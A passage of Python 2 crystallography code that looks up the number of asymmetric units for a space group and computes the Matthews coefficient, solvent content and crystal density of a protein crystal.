42/nnm': 16, 'I4(1)md': 16, 'Pm-3n': 48, 'P 42/mmc': 16, 'Ima2': 8}
def get_asym_units(PI):
SG=PI.spacegroup
print 'Looking for spacegroup: %s' %SG
if SGdata.has_key(SG):
print 'Found!'
return SGdata[SG]
# No exact match, then we search for the closest match
for cut in range(len(SG),3,-1):
nSG=SG[:cut]
if SGdata.has_key(nSG):
print 'Found %s' %nSG
return SGdata[nSG]
print 'Spacegroup not found: %s' %SG
return 1
def calculate_Vm(PI):
"""Calculate Vm, Protein volume, Solvent volume and crystal density"""
# Mass
Mw=calculate_mass(PI)
# Number of assymmetric units in unit cell
z=get_asym_units(PI)
# Unit cell volume
Vuc=calculate_unit_cell_volume(PI)
# Calculate Vm
Vm=Vuc/(Mw*z)
# Calculate protein volume
Na=6.02E23
densprot=1.35E-24 # g / A**3
protein_vol=100.0*Mw*z/(densprot*Na)/Vuc
solvent_vol=100.0-protein_vol
cryst_dens=(protein_vol*densprot*1E24+(100.0-protein_vol)*1.00)/100.0
return Vm,protein_vol,solvent_vol,cryst_dens,Vuc,Mw*z
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.